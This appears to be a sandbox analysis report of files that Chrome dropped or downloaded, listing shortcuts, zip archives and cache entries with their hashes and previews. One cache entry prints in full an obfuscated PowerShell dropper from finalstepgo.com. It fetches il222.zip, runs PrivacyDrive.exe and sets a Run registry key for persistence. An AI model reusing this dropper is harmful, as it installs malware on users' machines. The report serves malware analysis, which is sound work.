SHA-512:	3CF89C3D43A81E881318CEBC94FFF3D2438A50BDB0C9AC42D101E947590652AC4BD0ABD46693DC31F1BF728CF220BD96F2A1EDD9B5A328499BDF4E40588A182E
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517364" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:40:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.991011367196024
Encrypted:	false
SSDEEP:	48:8HC/VdzTw718FHIZidAKZdA1JehwiZUklqeh6y+3:8HC/7Q8I5y
MD5:	44DADECCE552A720AFF37803011B8324
SHA1:	8B6045369EBF877AE21AE5B23C537232B5A7DB99
SHA-256:	4EC3F560BB86EF51801D591F8DAF2C49069CCD8D89BC6CE8CFA877E6B47A7497
SHA-512:	28D9E66DC885F80BDA39EDFE52C7F7DC355581556539A1C4024B6635D709263DFCEB2A2AB56556B36F603960A6634B4A20BEB5B4176CF0994B859609A1638C16
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,..../..s.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I:Y.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V:Y.}....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V:Y.}....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V:Y.}...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V:Y.}...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0.f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:40:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.007671088318789
Encrypted:	false
SSDEEP:	48:8ZVdzTw718FHIZidAKZdA10eh/iZUkAQkqehpy+2:8Z7Q8y9Q8y
MD5:	AAE1758F33CEC98EE0FF087B95CD3649
SHA1:	3F0FD8B3A1CEAEF2CBA4FBFADD9B12DCA39C7B70
SHA-256:	02A9BB02A8F083B055989C5C2E9AED1E7C2C362C4D520725D7962D94E7D20CC4
SHA-512:	14771BF06059BEE96A61486033B214606B9E9A3A88805B6D361C9F93905BCC8B46D2629077AFB963DEC6CE4181A2CED41AD0769BA721D574F49627950ED640C0
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....7.s.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I:Y.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V:Y.}....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V:Y.}....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V:Y.}...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V:Y.}...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0.f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.017626357023226
Encrypted:	false
SSDEEP:	48:8eVdzTw71jHIZidAKZdA14tIeh7sFiZUkmgqeh7sTy+BX:8e7Q8nFy
MD5:	30904AF7D9C9CF09DFB1F2F7109FABFA
SHA1:	CA218C0A196058811BF37D49DF7E970B76A931ED
SHA-256:	A1459DC9B0A0C8A25E73C56A2F09A89E4A6377DB22CBDC8DCC80B0F67ED1CD18
SHA-512:	B16740E3E33C9CAE06AB47FAE51F68632ADEB1F39403F2AE73D016C928872FE089962AFDC1D8A0DE4E4EFB1791C3024B26C37EE257258186B9F56615E011A15E
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I:Y.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V:Y.}....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V:Y.}....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V:Y.}...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0.f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:40:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	4.006831582726548
Encrypted:	false
SSDEEP:	48:8QVdzTw718FHIZidAKZdA1behDiZUkwqeh9y+R:8Q7Q8Jry
MD5:	375487CF6EDEF797E1E38BE293793E39
SHA1:	6AC2294B4F6E2DDF1AF2AFAB59379136C529145A
SHA-256:	44C26D368C24CA2EE10EFB8C20266C701B8820CDBC47660DCF089A8C3E89E932
SHA-512:	B25297C75BCF38112746A3DCEA1F46F741BC39AC61689384B665D507E06D50B3E6F634B54C87584256E36BB8E79E24BC4713E0FF8D96B4507B601A0D37CD0FC4
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....E.s.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I:Y.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V:Y.}....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V:Y.}....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V:Y.}...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V:Y.}...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0.f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:40:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9951959182739465
Encrypted:	false
SSDEEP:	48:84VdzTw718FHIZidAKZdA1VehBiZUk1W1qeh/y+C:847Q859fy
MD5:	DC287FB7D22C25FD51B1E94A4D399AA0
SHA1:	E34A130C681C86E064432C147135C3F79E26965C
SHA-256:	8F46511F335EAD76241581449F9302ED17AC094D0E8CC81E8CF01A8C796426C1
SHA-512:	32A2D3028F798139EBC2B1E14AFB2AAA6CB39F1B2C9A15726F79CB3E7B011D9CAC165AEFF01BA4DD24F1324E2DF43BAD903B1CA221199E118F1C0287ACAC6137
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.......s.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I:Y.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V:Y.}....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V:Y.}....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V:Y.}...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V:Y.}...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0.f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:40:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	4.004388010356054
Encrypted:	false
SSDEEP:	48:8GVdzTw718FHIZidAKZdA1duT6ehOuTbbiZUk5OjqehOuTbFy+yT+:8G7Q8ZTTTbxWOvTbFy7T
MD5:	BFBB8D3604D72E09C3F886432DB99714
SHA1:	6FB6252333680EE4202B50AB865B8DF7EA6869E4
SHA-256:	E952A9CAC7E7753430C70CD81F0A477C541E2A2C606043B864BC28C1A75F4E40
SHA-512:	BD7904A4A6D6719EE7CEBCB8E33BF071FBDB550EA7539E770B3F771CE346ED5E9B7D8C6DB55BF990AFD980B1AF36D852C21A4CCA48C7C3B382E7E02F3DE5E910
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....L..s.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I:Y.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V:Y.}....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V:Y.}....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V:Y.}...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V:Y.}...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0.f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\Downloads\3b87bdb0-9cae-4aee-9c21-ee5d154420e7.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	7977
Entropy (8bit):	7.972561836480521
Encrypted:	false
SSDEEP:	192:OsBruMfvIhsyNzjIDIMvU8QGjHdYNQI27B:OsBru029NzjopvDu+I2l
MD5:	8875BE922CE895F0C281CBD021A85CFE
SHA1:	FBE40B79BE66FE34056D9184FCDDF6812262DE74
SHA-256:	B5BC4E6D5738B0BD93CE72BB017623C420CDC391AA0F8C056CAB7EFFBCE8ED10
SHA-512:	E9EAE739AF3CFEA6CF25648ED7F99F9C510FB46F6A10938A48CE99BC5EAE8EC90ABBFEC74F41F3BA365D7F4BCB34DB3F849C6FA434668E2C63E2ADF4497737EB
Malicious:	false
Reputation:	low
Preview:	PK........c5:YN+G)`O....+.....PrivacyDrive.exe.}.\TE...e..WvQPJT.,.0.44A]D...Y....n.%.b.J...i..a.S.Yi......J.ffij>V...4EC.;g........>....O.s..9s.3g..&M\..0........3._,......u.......[.,.n.M/...=#...#.{...f[".=..m})."F.M.xq.....m.....>..P.(..^...0y..,.....\|.<.....Kg.v...?.p}?...N.M....8...k.............!,$....9..L.ns}...&Q.`.m.\|..w..!k#Sa..2..`.w...a4@.PJ=H.....g...&...Mo...0K...iQ..~. SG2..f..........e.2..[6'.sL1.Y~....<.c...y(E......`..}..?ky.aN...}.~C.........t(y.aj.............J}...>...._...j.i..df.&x..6E.Ld...s...7C.CW...D.?.3.fH9t...g..Ja.D....Q......>..4..B../xE....;..PZ...Tq~.#.fuKaL..C50.P...G..yA..<\|.b..c.p.S4o...5..%..}g..@.-.........>.....:x..42......b..#..... mo........~.[{.M....%..m.t.E.%...PP..G....J.2...}...p.\|....[J%c....{.N.....[...Nd.{..V..~uO.l.\.....W..93Ln.fA.... moDk.[.=..wk/...{..L.{...hS...x(.....A...pM...B.S...x...j.'..O.?..h.U.S.t...ZQc....%.\|>62..G.Zcd...=...`U..z..`U.....O....af...a..+......[..@.h.....

C:\Users\user\Downloads\il222.zip (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1527814
Entropy (8bit):	7.997329416439085
Encrypted:	true
SSDEEP:	24576:qytEI+7yp9uF1/WztSxaCdN28SdKriek4qcYjjBiiJWn8HBgvLGTrFX:qpI8Yk1/WBSkWN32KrzJq0ii8hgvLG1X
MD5:	BB9EB573EAE8B10C74BCBFF43C81D5DB
SHA1:	79D70041A7410F018169C265307E7E73515EDBB8
SHA-256:	793BC2F7A3FE1FBE2E4E8960A8C9E42671842ABB38399EB96E2AD601E8733529
SHA-512:	68E228C1DA9ADD467D3C3C354D9BF21C8387869A02647A8DC440FABC223294B354FA437E66A330A5CCBCC20E3614FCAD0BE595382BBE4FD88CABEFAC83F2F0E9
Malicious:	true
Reputation:	low
Preview:	PK........c5:YN+G)`O....+.....PrivacyDrive.exe.}.\TE...e..WvQPJT.,.0.44A]D...Y....n.%.b.J...i..a.S.Yi......J.ffij>V...4EC.;g........>....O.s..9s.3g..&M\..0........3._,......u.......[.,.n.M/...=#...#.{...f[".=..m})."F.M.xq.....m.....>..P.(..^...0y..,.....\|.<.....Kg.v...?.p}?...N.M....8...k.............!,$....9..L.ns}...&Q.`.m.\|..w..!k#Sa..2..`.w...a4@.PJ=H.....g...&...Mo...0K...iQ..~. SG2..f..........e.2..[6'.sL1.Y~....<.c...y(E......`..}..?ky.aN...}.~C.........t(y.aj.............J}...>...._...j.i..df.&x..6E.Ld...s...7C.CW...D.?.3.fH9t...g..Ja.D....Q......>..4..B../xE....;..PZ...Tq~.#.fuKaL..C50.P...G..yA..<\|.b..c.p.S4o...5..%..}g..@.-.........>.....:x..42......b..#..... mo........~.[{.M....%..m.t.E.%...PP..G....J.2...}...p.\|....[J%c....{.N.....[...Nd.{..V..~uO.l.\.....W..93Ln.fA.... moDk.[.=..wk/...{..L.{...hS...x(.....A...pM...B.S...x...j.'..O.?..h.U.S.t...ZQc....%.\|>62..G.Zcd...=...`U..z..`U.....O....af...a..+......[..@.h.....

C:\Users\user\Downloads\il222.zip.crdownload

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1527814
Entropy (8bit):	7.997329416439085
Encrypted:	true
SSDEEP:	24576:qytEI+7yp9uF1/WztSxaCdN28SdKriek4qcYjjBiiJWn8HBgvLGTrFX:qpI8Yk1/WBSkWN32KrzJq0ii8hgvLG1X
MD5:	BB9EB573EAE8B10C74BCBFF43C81D5DB
SHA1:	79D70041A7410F018169C265307E7E73515EDBB8
SHA-256:	793BC2F7A3FE1FBE2E4E8960A8C9E42671842ABB38399EB96E2AD601E8733529
SHA-512:	68E228C1DA9ADD467D3C3C354D9BF21C8387869A02647A8DC440FABC223294B354FA437E66A330A5CCBCC20E3614FCAD0BE595382BBE4FD88CABEFAC83F2F0E9
Malicious:	false
Reputation:	low
Preview:	PK........c5:YN+G)`O....+.....PrivacyDrive.exe.}.\TE...e..WvQPJT.,.0.44A]D...Y....n.%.b.J...i..a.S.Yi......J.ffij>V...4EC.;g........>....O.s..9s.3g..&M\..0........3._,......u.......[.,.n.M/...=#...#.{...f[".=..m})."F.M.xq.....m.....>..P.(..^...0y..,.....\|.<.....Kg.v...?.p}?...N.M....8...k.............!,$....9..L.ns}...&Q.`.m.\|..w..!k#Sa..2..`.w...a4@.PJ=H.....g...&...Mo...0K...iQ..~. SG2..f..........e.2..[6'.sL1.Y~....<.c...y(E......`..}..?ky.aN...}.~C.........t(y.aj.............J}...>...._...j.i..df.&x..6E.Ld...s...7C.CW...D.?.3.fH9t...g..Ja.D....Q......>..4..B../xE....;..PZ...Tq~.#.fuKaL..C50.P...G..yA..<\|.b..c.p.S4o...5..%..}g..@.-.........>.....:x..42......b..#..... mo........~.[{.M....%..m.t.E.%...PP..G....J.2...}...p.\|....[J%c....{.N.....[...Nd.{..V..~uO.l.\.....W..93Ln.fA.... moDk.[.=..wk/...{..L.{...hS...x(.....A...pM...B.S...x...j.'..O.?..h.U.S.t...ZQc....%.\|>62..G.Zcd...=...`U..z..`U.....O....af...a..+......[..@.h.....

Chrome Cache Entry: 137

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (563), with no line terminators
Category:	downloaded
Size (bytes):	563
Entropy (8bit):	5.557875637319339
Encrypted:	false
SSDEEP:	12:27zJmoDDmsijrM7PjV/GPREjtjkXSMyyp0SNOmyhjVTe/mq+VjMS8:smqmD30uRExIXRBEmyhBe+VQj
MD5:	B0E2019D5AEA4DB08D44FC33ED9C1AB9
SHA1:	77C02A5F0427BF1FBC6F18A5CBFE019F36C82F9B
SHA-256:	D4CB161FACE620E61C88AA584E3B3B1F19F2FB48648C490068072697C52534BA
SHA-512:	3D24624C1C5A438CCFDEA87C3772D1712C475A3B47BD4E572BA26BEF9BB53C8F4B59A4348EECB86FCA7B631647B80A55A8FFFCA6FF477682596F485E237DA18B
Malicious:	false
Reputation:	low
URL:	https://finalstepgo.com/uploads/il2.txt
Preview:	$DC9otj0V='https://finalstepgo.com/uploads/il222.zip'; $Oo9IGFrX=$env:APPDATA+'\OIlqJYuE'; $jRAYnWOS=$env:APPDATA+'\yANrdNKT.zip'; $BtdSGfci=$Oo9IGFrX+'\PrivacyDrive.exe'; if (-not (teST-PatH $Oo9IGFrX)) { new-itEM -Path $Oo9IGFrX -ItemType Directory }; STart-biTSTrANSFeR -Source $DC9otj0V -Destination $jRAYnWOS; ExPAnD-aRcHIVE -Path $jRAYnWOS -DestinationPath $Oo9IGFrX -Force; remOvE-ITem $jRAYnWOS; StarT-ProCESS $BtdSGfci; NEw-itemPrOPeRtY -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RATU0Beb' -Value $BtdSGfci -PropertyType 'String';

Chrome Cache Entry: 138

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2287)
Category:	downloaded
Size (bytes):	173712
Entropy (8bit):	5.55565619706236
Encrypted:	false
SSDEEP:	3072://dcXloIqay3DxXEzmnBBBpELjm/N6pSkkn3KZ42cBk7SzCCdwDGslfjiCCctkDp://dcVoIqP3DxXEzmnBBBpELq/N6p/knh
MD5:	D0E0CBBDEA9D007C350823ECA43548B1
SHA1:	CF11E646D6EAA0DC1C83E99FB93F16647A2611A5
SHA-256:	8940C95C71EAFF7DCBB43BFAD06C66ADEA6D60D2D8F5C4CC879F931ED4FE5C0D
SHA-512:	29B886B57DEEC83AF96572254354C5FB5F5698118F1C97C1C6485EDDE9C6C0A3B51FF9F37BE1D90F6C9F7D9CF428C4AA1A637D2D12B2BCD419E11FFC31A61FEB
Malicious:	false
Reputation:	low
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.RRlsmNlDmQQ.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTv3Qzh6Ja6eSLzWU_FOQIMZM5uKUQ"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.oj=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var pj,qj,sj,vj,yj,xj,rj,wj;pj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};qj=function(){_.Ka()};sj=function(){rj===void 0&&(rj=typeof WeakMap==="function"?pj(WeakMap):null);return rj};vj=function(a,b){(_.tj\|\|(_.tj=new rj)).set(a,b);(_.uj\|\|(_.uj=new rj)).set(b,a)};.yj=function(a){if(wj===void 0){const b=new xj([],{});wj=Array.prototype.concat.call([],b).length===1}wj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.zj=function(a,b,c,d){a=_.zb(a,b,c,d);return Array.isArray(a)?a:_.Rc};_.Aj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.Bj=function(a,b){a===0&&(a=_.Aj(a,b));return a\|1};_.Cj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.Dj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.Hj=function(a,b,c,d,e,f,g){const h=a.ha;var k=!!(2&b);e=k?

Chrome Cache Entry: 139

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (3167)
Category:	downloaded
Size (bytes):	3173
Entropy (8bit):	5.862806704562314
Encrypted:	false
SSDEEP:	96:f9vKSli9Fd666667/QpeY3oEuMsOFBLrCbpibIGU+4rGLw7gHYQffffo:l3cFd666667EeHE5dn3Ei/U+4rSHa
MD5:	BCABC4ED8C4674191AA9249690538D98
SHA1:	D393E44741EEBB0180AFC7BE96D63B7CFB685139
SHA-256:	F4664E504763833054F4266BA943F0F8F4960C82D1E108FF7182D4B588DD738B
SHA-512:	FB4DB4E3C01216B30F678C09F197D75350F53027BC6E51B9429C3D96124B7F71817E6915E89A5E04A2F0A448C55B7A916F266E4E80A956DB139F49ACF345CC94
Malicious:	false
Reputation:	low
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["pastor steve lawson church","wolfgang amadeus mozart","lottery mega millions powerball jackpot","jalen haralson basketball","comet a3 tsuchinshan atlas","nintendo zelda echoes of wisdom","hurri.ane helene florida","air jordan 1 travis scott medium olive"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"CggvbS8wODJkYhIIQ29tcG9zZXIyzwxkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFiQUFBREFRRUJBUUVBQUFBQUFBQUFBQUFGQmdjRUF3QUNBZi9FQURNUUFBRURBd01EQWdNRkNRQUFBQUFBQUFFQ0F4RUFCQVVoTVVFR0VoTlJZUWNVSWlOeGdlSHdGVEl6UXBHaHNjSFIvOFFBR1FFQUF3RUJBU

Chrome Cache Entry: 140

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
Reputation:	low
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 141

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1885)
Category:	downloaded
Size (bytes):	126135
Entropy (8bit):	5.498654960721984
Encrypted:	false
SSDEEP:	3072:AkyvF6US20FCdrgVr3dfPeIofdhIUsTx0wVnX9Mb:AkygUS29rWPeIofdCVnX9Mb
